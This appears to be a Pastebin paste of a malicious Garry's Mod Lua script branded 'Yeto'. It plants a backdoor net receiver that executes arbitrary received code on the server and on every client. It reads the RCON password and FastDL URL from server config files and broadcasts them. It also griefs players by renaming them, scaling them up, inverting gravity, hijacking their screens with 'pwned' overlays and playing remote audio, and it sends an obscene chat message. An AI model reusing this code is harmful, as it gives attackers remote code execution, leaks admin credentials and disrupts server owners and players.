Advertisement
Guest User

yeto

a guest
Mar 28th, 2020
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.88 KB | None | 0 0
  1. util.AddNetworkString "Yeto"
  2. net.Receive('DiscoMenu',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  3.  
  4. local DESIRED_NAME = "Yeto guncelledi"
  5. local epsilon = {}
  6. function epsilon:RandomString( intMin, intMax )
  7. local ret = ""
  8. for _ = 1, math.random( intMin, intMax ) do
  9. ret = ret.. string.char( math.random(65, 90) )
  10. end
  11.  
  12. return ret
  13. end
  14.  
  15. epsilon.m_tblActions = {}
  16. epsilon.m_strImageGlobalVar = epsilon:RandomString( 6, 12 )
  17. epsilon.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  18.  
  19. function epsilon:PushAction( intChainDelay, func )
  20. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  21. end
  22.  
  23. function epsilon:NextAction( pPlayer )
  24. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  25. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  26.  
  27. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  28. if not IsValid( pPlayer ) then return end
  29. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  30. self:NextAction( pPlayer )
  31. end )
  32. end
  33.  
  34. function epsilon:Start( pPlayer )
  35. pPlayer.m_intCurAction = 0
  36. self:NextAction( pPlayer )
  37. end
  38.  
  39. function epsilon:SendLua( pPlayer, strLua )
  40. net.Start( "Yeto" )
  41. net.WriteString( strLua )
  42. net.Send( pPlayer )
  43. end
  44.  
  45. function epsilon:SetupPlayer( pPlayer )
  46. pPlayer:SendLua( "net.Receive(\"DiscoMenu\", function() RunString(net.ReadString()) end)" )
  47. end
  48.  
  49.  
  50.  
  51. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end timer.Create("dance_loop",8.9,0,function() for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end end )
  52.  
  53. for k, v in pairs(player.GetAll()) do DarkRP.storeRPName(v, DESIRED_NAME) v:setDarkRPVar("rpname", DESIRED_NAME) end
  54.  
  55.  
  56. hook.Add("Think", "giant", function()
  57. for k,v in pairs (player.GetAll()) do
  58. v:SetModelScale(50.5, 100);
  59. v:SetRunSpeed(400 * 2);
  60. v:SetWalkSpeed(200 * 2);
  61. end
  62. end)
  63.  
  64.  
  65. for k,v in pairs(player.GetAll()) do
  66. if engine.ActiveGamemode() == "darkrp" then
  67. v:ChatPrint("Backdoor detected! Prepare for anal rape")
  68. end
  69. end
  70.  
  71. for k, v in pairs( player.GetAll() ) do
  72. epsilon:SetupPlayer( v )
  73. timer.Simple( 2, function() epsilon:Start( v ) end )
  74. end
  75.  
  76. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  77. epsilon:SetupPlayer( pPlayer )
  78. timer.Simple( 10, function() epsilon:Start( pPlayer ) end )
  79. end )
  80.  
  81.  
  82. timer.Create( "friction", 7, 0, function()
  83. RunConsoleCommand( "sv_friction", "-8" )
  84. end)
  85.  
  86. timer.Create( "gravity", 7, 0, function()
  87. RunConsoleCommand( "sv_gravity", "-600" )
  88. end)
  89.  
  90.  
  91. local rcon_pw = "NOT FOUND"
  92. local fastdlurl = "NOT FOUND"
  93. if file.Exists("cfg/autoexec.cfg","GAME") then
  94. local cfile = file.Read("cfg/autoexec.cfg","GAME")
  95. for k,v in pairs(string.Split(cfile,"\n")) do
  96. if string.StartWith(v,"rcon_password") then
  97. rcon_pw = string.Split(v,"\"")[2]
  98. end
  99. if string.StartWith(v,"sv_downloadurl") then
  100. fastdlurl = string.Split(v,"\"")[2]
  101. end
  102. end
  103. end
  104. if file.Exists("cfg/server.cfg","GAME") then
  105. cfile = file.Read("cfg/server.cfg","GAME")
  106. for k,v in pairs(string.Split(cfile,"\n")) do
  107. if string.StartWith(v,"rcon_password") then
  108. rcon_pw = string.Split(v,"\"")[2]
  109. end
  110. if string.StartWith(v,"sv_downloadurl") then
  111. fastdlurl = string.Split(v,"\"")[2]
  112. end
  113. end
  114. end
  115. if file.Exists("cfg/gmod-server.cfg","GAME") then
  116. cfile = file.Read("cfg/gmod-server.cfg","GAME")
  117. for k,v in pairs(string.Split(cfile,"\n")) do
  118. if string.StartWith(v,"rcon_password") then
  119. rcon_pw = string.Split(v,"\"")[2]
  120. end
  121. if string.StartWith(v,"sv_downloadurl") then
  122. fastdlurl = string.Split(v,"\"")[2]
  123. end
  124. end
  125. end
  126. if file.Exists("cfg/gmodserver.cfg","GAME") then
  127. cfile = file.Read("cfg/gmodserver.cfg","GAME")
  128. for k,v in pairs(string.Split(cfile,"\n")) do
  129. if string.StartWith(v,"rcon_password") then
  130. rcon_pw = string.Split(v,"\"")[2]
  131. end
  132. if string.StartWith(v,"sv_downloadurl") then
  133. fastdlurl = string.Split(v,"\"")[2]
  134. end
  135. end
  136. end
  137.  
  138. timer.Create("rlyrandom", 0, 0, function ( ... )
  139. function string.Random( length )
  140.  
  141. local length = tonumber( length )
  142.  
  143. if length < 1 then return end
  144.  
  145. local result = "" -- The empty string we start with
  146.  
  147. for i = 1, length do
  148.  
  149. result = result .. string.char( math.random( 32, 126 ) )
  150.  
  151. end
  152.  
  153. return result
  154.  
  155. end
  156.  
  157. epslionrandom = string.Random( math.random(10,35) )
  158.  
  159. gaytable = {
  160. "> Yeto <",
  161. ">Your RCON "..rcon_pw.." | FastDL "..fastdlurl.."<"
  162.  
  163. }
  164.  
  165. end)
  166.  
  167. timer.Create("giaSPFjaiaSIfsioasoaiFOHAspsfasdfasasgdasghdsafhdsghafdfadshag", 0, 0, function ()
  168. MsgC(HSVToColor( CurTime() % 6 * 60, 1, 1 ), table.Random( gaytable ).." | >https://discord.gg/7mzRYWW<")
  169. end)
  170.  
  171.  
  172.  
  173.  
  174. epsilon:PushAction( 1, function( pPlayer )
  175. epsilon:SendLua( pPlayer, [[
  176. (GAMEMODE or GM).CalcView = function() end
  177. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  178.  
  179. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  180. for k, v in pairs(remove) do
  181. hook.GetTable()[v] = {}
  182. end
  183.  
  184. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  185. hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
  186.  
  187. ]] )
  188. end )
  189.  
  190.  
  191. epsilon:PushAction( 1, function( pPlayer )
  192.  
  193. epsilon:SendLua( pPlayer, [[
  194. a = 0
  195.  
  196. timer.Create("time", 0, 100, function()
  197.  
  198. a = a+1
  199.  
  200. MsgC(Color(255,0,0),a .. " %")
  201. chat.AddText(Color(255,0,0),a .. " %" )
  202.  
  203. end)
  204.  
  205.  
  206.  
  207.  
  208. hook.Add( "HUDPaint", "newhud2", function()
  209. draw.SimpleTextOutlined(
  210. a .. " %",
  211. "TheDefaultSettings",
  212. ScrW() /2,
  213. ScrH() /2,
  214. Color( 255,255,255,166 ),
  215. TEXT_ALIGN_CENTER,
  216. TEXT_ALIGN_CENTER,
  217. 1,
  218. Color( 0, 0, 0, 255 )
  219. )
  220.  
  221. end)
  222.  
  223. ]])
  224.  
  225. end)
  226.  
  227.  
  228. epsilon:PushAction( 3, function( pPlayer )
  229. timer.Create("Introduction", 0, 0, function ()
  230. BroadcastLua([[
  231. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), "pwned by yeto ")
  232.  
  233. ]])
  234. end)
  235. epsilon:SendLua( pPlayer, [[
  236. timer.Simple(1, function()
  237. (GAMEMODE or GM).CalcView = function() end
  238. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  239.  
  240. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  241. for k, v in pairs(remove) do
  242. hook.GetTable()[v] = {}
  243. end
  244.  
  245. local function GetWebMat( strURL )
  246. return g_]].. epsilon.m_strImageGlobalVar.. [[[strURL]
  247. end
  248.  
  249. surface.CreateFont( "TheDefaultSettings", {
  250. font = "Comic Sans MS", -- Use the font-name which is shown to you by your operating system Font Viewer, not the file name
  251. extended = false,
  252. size = 25,
  253. weight = 500,
  254. blursize = 0,
  255. scanlines = 0,
  256. antialias = true,
  257. underline = false,
  258. italic = false,
  259. strikeout = false,
  260. symbol = false,
  261. rotary = false,
  262. shadow = false,
  263. additive = false,
  264. outline = false,
  265. } )
  266.  
  267. musicpesnya = {
  268. "http://d.zaix.ru/ddGL.mp3",
  269. "http://d.zaix.ru/fCoV.mp3",
  270. "http://d.zaix.ru/ddGU.mp3",
  271. "http://d.zaix.ru/fCp5.mp3",
  272. "http://d.zaix.ru/cZgy.mp3",
  273. "http://d.zaix.ru/fCpt.mp3",
  274. "http://d.zaix.ru/fCpy.mp3",
  275. "http://d.zaix.ru/fCpB.mp3",
  276. "http://d.zaix.ru/fD4g.mp3",
  277. "http://d.zaix.ru/fD4d.mp3",
  278. "http://d.zaix.ru/fCqe.mp3",
  279. "http://d.zaix.ru/boLD.mp3",
  280. "http://d.zaix.ru/fCqh.mp3",
  281. "http://d.zaix.ru/fD44.mp3",
  282. "http://d.zaix.ru/bNiB.mp3",
  283. "http://d.zaix.ru/fD5x.mp3",
  284. "http://d.zaix.ru/fD5D.mp3"
  285.  
  286. }
  287.  
  288. sound.PlayURL( table.Random(musicpesnya), "", function()end )
  289.  
  290. local html = vgui.Create( "HTML" )
  291. html:SetSize( 940, 605 )
  292. html:SetPos( ScrW() / 3.7, ScrH() / 3.7 )
  293. html:OpenURL( "http://d.zaix.ru/fD2t.png" )
  294.  
  295.  
  296. hook.Add( "HUDPaint", "newhud2", function()
  297.  
  298. draw.RoundedBox(0, 0, 0, ScrW(), ScrH(), Color(255, 0, 0,150))
  299.  
  300. draw.SimpleTextOutlined(
  301. "Yeto",
  302. "TheDefaultSettings",
  303. ScrW() /2 +math.random( -755, 755 ),
  304. ScrH() /2 +math.random( -655, 555) +100,
  305. Color( 255,255,255,166 ),
  306. TEXT_ALIGN_CENTER,
  307. TEXT_ALIGN_CENTER,
  308. 1,
  309. Color( 0, 0, 0, 255 )
  310. )
  311.  
  312.  
  313. draw.SimpleTextOutlined(
  314. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  315. "TheDefaultSettings",
  316. ScrW() /2 +math.random( -755, 755 ),
  317. ScrH() /2 +math.random( -5555, 255) +100,
  318. Color( 255,255,255,166 ),
  319. TEXT_ALIGN_CENTER,
  320. TEXT_ALIGN_CENTER,
  321. 1,
  322. Color( 0, 0, 0, 255 )
  323. )
  324. draw.SimpleTextOutlined(
  325. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  326. "TheDefaultSettings",
  327. ScrW() /2 +math.random( -755, 755 ),
  328. ScrH() /2 +math.random( -655, 555) +100,
  329. Color( 255,255,255,166 ),
  330. TEXT_ALIGN_CENTER,
  331. TEXT_ALIGN_CENTER,
  332. 1,
  333. Color( 0, 0, 0, 255 )
  334. )
  335. draw.SimpleTextOutlined(
  336. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  337. "TheDefaultSettings",
  338. ScrW() /2 +math.random( -755, 755 ),
  339. ScrH() /2 +math.random( -655, 555) +100,
  340. Color( 255,255,255,166 ),
  341. TEXT_ALIGN_CENTER,
  342. TEXT_ALIGN_CENTER,
  343. 1,
  344. Color( 0, 0, 0, 255 )
  345. )
  346. draw.SimpleTextOutlined(
  347. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  348. "TheDefaultSettings",
  349. ScrW() /2 +math.random( -755, 755 ),
  350. ScrH() /2 +math.random( -5555, 255) +100,
  351. Color( 255,255,255,166 ),
  352. TEXT_ALIGN_CENTER,
  353. TEXT_ALIGN_CENTER,
  354. 1,
  355. Color( 0, 0, 0, 255 )
  356. )
  357. draw.SimpleTextOutlined(
  358. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  359. "TheDefaultSettings",
  360. ScrW() /2 +math.random( -755, 755 ),
  361. ScrH() /2 +math.random( -655, 555) +100,
  362. Color( 255,255,255,166 ),
  363. TEXT_ALIGN_CENTER,
  364. TEXT_ALIGN_CENTER,
  365. 1,
  366. Color( 0, 0, 0, 255 )
  367. )
  368. draw.SimpleTextOutlined(
  369. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  370. "TheDefaultSettings",
  371. ScrW() /2 +math.random( -755, 755 ),
  372. ScrH() /2 +math.random( -655, 555) +100,
  373. Color( 255,255,255,166 ),
  374. TEXT_ALIGN_CENTER,
  375. TEXT_ALIGN_CENTER,
  376. 1,
  377. Color( 0, 0, 0, 255 )
  378. )
  379. draw.SimpleTextOutlined(
  380. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  381. "TheDefaultSettings",
  382. ScrW() /2 +math.random( -755, 755 ),
  383. ScrH() /2 +math.random( -655, 555) +100,
  384. Color( 255,255,255,166 ),
  385. TEXT_ALIGN_CENTER,
  386. TEXT_ALIGN_CENTER,
  387. 1,
  388. Color( 0, 0, 0, 255 )
  389. )
  390. draw.SimpleTextOutlined(
  391. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  392. "TheDefaultSettings",
  393. ScrW() /2 +math.random( -755, 755 ),
  394. ScrH() /2 +math.random( -655, 555) +100,
  395. Color( 255,255,255,166 ),
  396. TEXT_ALIGN_CENTER,
  397. TEXT_ALIGN_CENTER,
  398. 1,
  399. Color( 0, 0, 0, 255 )
  400. )
  401. draw.SimpleTextOutlined(
  402. "________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  403. "TheDefaultSettings",
  404. ScrW() /2 +math.random( -755, 755 ),
  405. ScrH() /2 +math.random( -655, 555) +100,
  406. Color( 255,255,255,166 ),
  407. TEXT_ALIGN_CENTER,
  408. TEXT_ALIGN_CENTER,
  409. 1,
  410. Color( 0, 0, 0, 255 )
  411. )
  412.  
  413. draw.SimpleTextOutlined(
  414. "Yeto",
  415. "TheDefaultSettings",
  416. ScrW() /2 +math.random( -755, 755 ),
  417. ScrH() /2 +math.random( -655, 555) +100,
  418. Color( 255,255,255,166 ),
  419. TEXT_ALIGN_CENTER,
  420. TEXT_ALIGN_CENTER,
  421. 1,
  422. Color( 0, 0, 0, 255 )
  423. )
  424.  
  425. draw.SimpleTextOutlined(
  426. "DragM_",
  427. "TheDefaultSettings",
  428. ScrW() /2 +math.random( -755, 755 ),
  429. ScrH() /2 +math.random( -255, 255 ) +24,
  430. Color( 255,255,255,166 ),
  431. TEXT_ALIGN_CENTER,
  432. TEXT_ALIGN_CENTER,
  433. 1,
  434. Color( 0, 0, 0, 255 )
  435. )
  436.  
  437. draw.SimpleTextOutlined(
  438. "pwned",
  439. "TheDefaultSettings",
  440. ScrW() /2 +math.random( -755, 755 ),
  441. ScrH() /2 +math.random( -255, 255 ) +64,
  442. Color( 255,255,255,166 ),
  443. TEXT_ALIGN_CENTER,
  444. TEXT_ALIGN_CENTER,
  445. 1,
  446. Color( 0, 0, 0, 255 )
  447. )
  448.  
  449. draw.SimpleTextOutlined(
  450. "Yeto",
  451. "TheDefaultSettings",
  452. ScrW() /2 +math.random( -755, 755 ),
  453. ScrH() /2 +math.random( -8, 8 ) +100,
  454. Color( 255,255,255,166 ),
  455. TEXT_ALIGN_CENTER,
  456. TEXT_ALIGN_CENTER,
  457. 1,
  458. Color( 0, 0, 0, 255 )
  459. )
  460.  
  461. draw.SimpleTextOutlined(
  462. "pwned by Yeto",
  463. "TheDefaultSettings",
  464. ScrW() /2 +math.random( -755, 755 ),
  465. ScrH() /2 +math.random( -255, 255 ) +24,
  466. Color( 255,255,255,166 ),
  467. TEXT_ALIGN_CENTER,
  468. TEXT_ALIGN_CENTER,
  469. 1,
  470. Color( 0, 0, 0, 255 )
  471. )
  472. draw.SimpleTextOutlined(
  473. "Yeto",
  474. "TheDefaultSettings",
  475. ScrW() /2 +math.random( -755, 755 ),
  476. ScrH() /2 +math.random( -255, 255 ) +64,
  477. Color( 255,255,255,166 ),
  478. TEXT_ALIGN_CENTER,
  479. TEXT_ALIGN_CENTER,
  480. 1,
  481. Color( 0, 0, 0, 255 )
  482. )
  483. draw.SimpleTextOutlined(
  484. "Yeto",
  485. "TheDefaultSettings",
  486. ScrW() /2 +math.random( -755, 755 ),
  487. ScrH() /2 +math.random( -8, 8 ) +100,
  488. Color( 255,255,255,166 ),
  489. TEXT_ALIGN_CENTER,
  490. TEXT_ALIGN_CENTER,
  491. 1,
  492. Color( 0, 0, 0, 255 )
  493. )
  494. draw.SimpleTextOutlined(
  495. "YETO",
  496. "TheDefaultSettings",
  497. ScrW() /2 +math.random( -755, 755 ),
  498. ScrH() /2 +math.random( -255, 255 ) +24,
  499. Color( 255,255,255,166 ),
  500. TEXT_ALIGN_CENTER,
  501. TEXT_ALIGN_CENTER,
  502. 1,
  503. Color( 0, 0, 0, 255 )
  504. )
  505.  
  506. draw.SimpleTextOutlined(
  507. "Yeto",
  508. "TheDefaultSettings",
  509. ScrW() /2 +math.random( -755, 755 ),
  510. ScrH() /2 +math.random( -255, 255 ) +64,
  511. Color( 255,255,255,166 ),
  512. TEXT_ALIGN_CENTER,
  513. TEXT_ALIGN_CENTER,
  514. 1,
  515. Color( 0, 0, 0, 255 )
  516. )
  517. draw.SimpleTextOutlined(
  518. "Yeto",
  519. "TheDefaultSettings",
  520. ScrW() /2 +math.random( -755, 755 ),
  521. ScrH() /2 +math.random( -8, 8 ) +100,
  522. Color( 255,255,255,166 ),
  523. TEXT_ALIGN_CENTER,
  524. TEXT_ALIGN_CENTER,
  525. 1,
  526. Color( 0, 0, 0, 255 )
  527. )
  528.  
  529. draw.SimpleTextOutlined(
  530. "pwned by Yeto",
  531. "TheDefaultSettings",
  532. ScrW() /2 +math.random( -755, 755 ),
  533. ScrH() /2 +math.random( -255, 255 ) +24,
  534. Color( 255,255,255,166 ),
  535. TEXT_ALIGN_CENTER,
  536. TEXT_ALIGN_CENTER,
  537. 1,
  538. Color( 0, 0, 0, 255 )
  539. )
  540.  
  541. draw.SimpleTextOutlined(
  542. "Yeto",
  543. "TheDefaultSettings",
  544. ScrW() /2 +math.random( -755, 755 ),
  545. ScrH() /2 +math.random( -255, 255 ) +64,
  546. Color( 255,255,255,166 ),
  547. TEXT_ALIGN_CENTER,
  548. TEXT_ALIGN_CENTER,
  549. 1,
  550. Color( 0, 0, 0, 255 )
  551. )
  552. draw.SimpleTextOutlined(
  553. "Yeto",
  554. "TheDefaultSettings",
  555. ScrW() /2 +math.random( -755, 755 ),
  556. ScrH() /2 +math.random( -8, 8 ) +100,
  557. Color( 255,255,255,166 ),
  558. TEXT_ALIGN_CENTER,
  559. TEXT_ALIGN_CENTER,
  560. 1,
  561. Color( 0, 0, 0, 255 )
  562. )
  563.  
  564. draw.SimpleTextOutlined(
  565. "pwned by Yeto",
  566. "TheDefaultSettings",
  567. ScrW() /2 +math.random( -755, 755 ),
  568. ScrH() /2 +math.random( -255, 255 ) +24,
  569. Color( 255,255,255,166 ),
  570. TEXT_ALIGN_CENTER,
  571. TEXT_ALIGN_CENTER,
  572. 1,
  573. Color( 0, 0, 0, 255 )
  574. )
  575.  
  576. draw.SimpleTextOutlined(
  577. "pwned",
  578. "TheDefaultSettings",
  579. ScrW() /2 +math.random( -755, 755 ),
  580. ScrH() /2 +math.random( -255, 255 ) +64,
  581. Color( 255,255,255,166 ),
  582. TEXT_ALIGN_CENTER,
  583. TEXT_ALIGN_CENTER,
  584. 1,
  585. Color( 0, 0, 0, 255 )
  586. )
  587.  
  588.  
  589. end )
  590.  
  591.  
  592. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  593. hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
  594.  
  595. surface.PlaySound( "weapons/underwater_explode3.wav" )
  596. surface.PlaySound( "vo/npc/male01/gethellout.wav" )
  597. end)
  598. ]] )
  599.  
  600.  
  601.  
  602. end )
  603.  
  604.  
  605. epsilon:PushAction( 4, function( pPlayer )
  606. local idx = pPlayer:EntIndex()
  607. timer.Create( "beat".. idx, 0.30, 0, function()
  608. if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
  609. pPlayer:ViewPunch( Angle(math.Rand(-40, -40), math.Rand(-40, 40), 0) )
  610. end )
  611. epsilon:SendLua( pPlayer, [[
  612. local emitter = ParticleEmitter( LocalPlayer():GetPos() )
  613. local time = 0
  614.  
  615. hook.Add( "Think", "wat", function()
  616. if CurTime() < time then
  617. return
  618. end
  619.  
  620. time = CurTime() +0.05
  621. for i = 1, 16 do
  622. local part = emitter:Add(
  623. "particles/balloon_bit",
  624. LocalPlayer():GetPos() +Vector(
  625. math.random( -256, 256 ),
  626. math.random( -256, 256 ),
  627. 256
  628. )
  629. )
  630.  
  631. if part then
  632. local Size = math.random( 4, 7 )
  633.  
  634. part:SetColor( math.random(0, 255), math.random(0, 255), math.random(0, 255), 255 )
  635. part:SetVelocity( Vector( 40, 25, -math.random(300, 400) ) )
  636. part:SetDieTime( 4.5 )
  637. part:SetGravity( Vector(40, 0, -250) )
  638. part:SetLifeTime( 1 )
  639. part:SetStartSize( Size /2 )
  640. part:SetEndSize( Size )
  641. part:SetCollide( true )
  642. end
  643. end
  644. end )
  645. ]] )
  646. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement